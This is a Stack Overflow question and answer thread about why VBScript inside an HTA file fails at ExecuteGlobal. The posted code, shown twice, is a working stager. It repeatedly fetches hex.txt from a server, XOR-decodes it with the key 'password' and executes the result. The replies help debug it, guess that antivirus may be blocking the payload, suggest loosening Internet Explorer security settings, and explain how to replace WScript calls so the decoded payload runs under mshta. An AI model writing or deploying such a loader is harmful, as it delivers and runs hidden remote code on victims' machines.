# Usage of ExecuteGlobal() in HTA file

Tags: vbscript, hta

I have a vbscript which works fine when executed stand alone i.e.

```
On Error Resume Next:
            Set a=CreateObject("MSXML2.ServerXMLHTTP.6.0"):
            a.setOption 2,13056:
            while(Len(b) = 0):
                a.open"GET","http://127.0.0.1/hex.txt",False:
                a.send: 
                b = a.responseText:
            wend:
            k="password":
            for i = 0 to Len(b) - 1 Step 2:
                c = c & Chr(Asc(Chr("&H" & Mid(b, i + 1, 2))) xor Asc(Mid(k, ((i / 2)mod Len(k)) + 1, 1))):
        
            Next:
            ExecuteGlobal c:
```

But when i include this script inside HTA, It doesn't execute the (ExecuteGlobal c:) i.e.

```
<html>
<head>
<script language="VBScript"> 
    Sub RunProgram
            On Error Resume Next:
            Set a=CreateObject("MSXML2.ServerXMLHTTP.6.0"):
            a.setOption 2,13056:
            while(Len(b) = 0):
                a.open"GET","http://127.0.0.1/hex.txt",False:
                a.send: 
                b = a.responseText:
            wend:
            k="password":
            for i = 0 to Len(b) - 1 Step 2:
                c = c & Chr(Asc(Chr("&H" & Mid(b, i + 1, 2))) xor Asc(Mid(k, ((i / 2)mod Len(k)) + 1, 1))):
        
            Next:
            ExecuteGlobal c:   
        End Sub
    RunProgram()
</script>
</head> 
<body>
 
</body>
</html>
```

I think the issue is with the (ExecuteGlobal c:) portion, it doesn't execute in HTA but it is executed fine when i use the vbscript alone.

Comment: Because that isn't a HTA so the won’t allow to use code like `ExecuteGlobal`. You need to include the [`<HTA:APPLICATION>`](https://learn.microsoft.com/en-us/previous-versions/ms536495(v=vs.85)) element.

Comment: why do you end each line with a `:` ? Seems weird to me.

Answer (score 0, accepted):

**Updated Answer:**

Based on [the comments](https://stackoverflow.com/questions/68356597/usage-of-executeglobal-in-hta-file#comment120817595_68357452) it clear that the issue is in the decoded script you try to run making a reference to `WScript` which is an object [not accessible outside of the Windows Scripting Host](https://stackoverflow.com/a/40484681/692942) (`wscript.exe` and `cscript.exe`). It is not available from within an HTA as the MSHTA scripting host doesn't support it.

---

**Original Answer:**

The HTML code example at the moment is not an HTA as it is missing the [`<HTA:APPLICATION>`](https://learn.microsoft.com/en-us/previous-versions/ms536495(v=vs.85)) element.

Try adding;

```html
<HTA:APPLICATION ID="oHTA"
     APPLICATIONNAME="myApp"
     BORDER="thin"
     BORDERSTYLE="normal"
     CAPTION="yes"
     ICON=""
     MAXIMIZEBUTTON="yes"
     MINIMIZEBUTTON="yes"
     SHOWINTASKBAR="no"
     SINGLEINSTANCE="no"
     SYSMENU="yes"
     VERSION="1.0"
     WINDOWSTATE="maximize"/>
```

to the HTML inside the `HEAD` element.

---

#### Useful Links

- [Introduction to HTML Applications (HTAs)](https://learn.microsoft.com/en-us/previous-versions/ms536496(v=vs.85))

Comment: Thanks for the reply, i have added the above lines but it didn't work. I think the HTA doesn't properly run (ExecuteGlobal c: ) because when i use the vbscript alone, it works fine but in HTA it doesn't

Comment: @user260854 How are you running your HTA? It should  be via `mshta.exe` and the file should have a `.hta` extension anything else like just opening it locally in the web browser will not work. I’ve added a link to the official documentation to get you started.

Comment: I'm executing using mshta and it executes fine because i can see on my host system that hex.txt is fetched successfully but  (ExecuteGlobal c) doesn't execute

Comment: @user260854 are you running some AV software that could be reading the script as a false positive (assuming the script isn't malicious)? If you are using the script in the context of an HTA there is no reason why `ExecuteGlobal` shouldn't work, I've used it myself many times but have also encountered issues with 3rd party AV and MW programs blocking it from running.

Comment: @user260854 Also, how do you know `ExecuteGlobal` doesn't execute? I would start by trying a simpler piece of code in `c` to test it like `c = "MsgBox ""test"""` and see if that executes, you should have a popup message with the word `test` appear.

Comment: I'm running http server on my server side so when the hex file is fetched. i get notified on the server. But in ExecuteGlobal() i'm also fetching some files but the server didn't show notification related to those files therefore i though that the ExecuteGlobal() doesn't execute (properly i suppose)

Comment: @user260854 in which case, I would try a simpler test to check `ExecuteGlobal` is not executing as I [suggested in the previous comment](https://stackoverflow.com/questions/68356597/usage-of-executeglobal-in-hta-file#comment120812153_68357452). It's more likely the overly complex hex decode is what is not doing what you expect.

Comment: You are right as i've tried a simple MsgBox and it executed successfully. The confusion lies in the fact that the same decoding mechanism works fine when executed standalone as vbs script.
I have executed this same vbs portion several times and it works fine without the HTA but when executed as a part of HTA, it create problem.

Comment: @user260854 in which case it's not `ExecuteGlobal` that is the problem but likely some 3rd party app is flagging the payload you are trying to execute as malicious and blocking its execution.

Comment: @user260854 You could comment out the `On Error Resume Next` temporarily and see if the code is throwing any errors.

Comment: Also, you might need to play with the `iexplore.exe` security settings in the Internet Options dialogue as this is what MSHTA uses when restricting access to ActiveX controls etc.

Comment: @Flakes : I had commented out (On Error Resume Next) and got this error
"Object required: 'Wscript'

Comment: @user260854 The `hex.txt` decode contains a script that uses `WScript` but that object [isn't native to VBScript](https://stackoverflow.com/a/40484681/692942) it's part of the scripting host used by VBScript. That explains why it works when you run VBScript via the `cscript/wscript` scripting host.

Comment: Yes, thats right. I'm using wscript in the following so i would need their alternative for HTA.
1) Wscript.Stdout
2) WScript.CreateObject( )
3) WScript.Sleep

Comment: @user260854 well `CreateObject()` is built into VBScript anyway so just drop the `WScript.`. As for `Sleep` this is covered with [another answer](https://stackoverflow.com/a/13099520/692942). The weird one is `StdOut` because it's part of the `WScript.Shell` by calling the `Exec()` method, so that should be fine only references directly to `WScript` will cause issues.

Comment: Thank you, i think I have to create another thread for solving the Wscript.Stdout issue.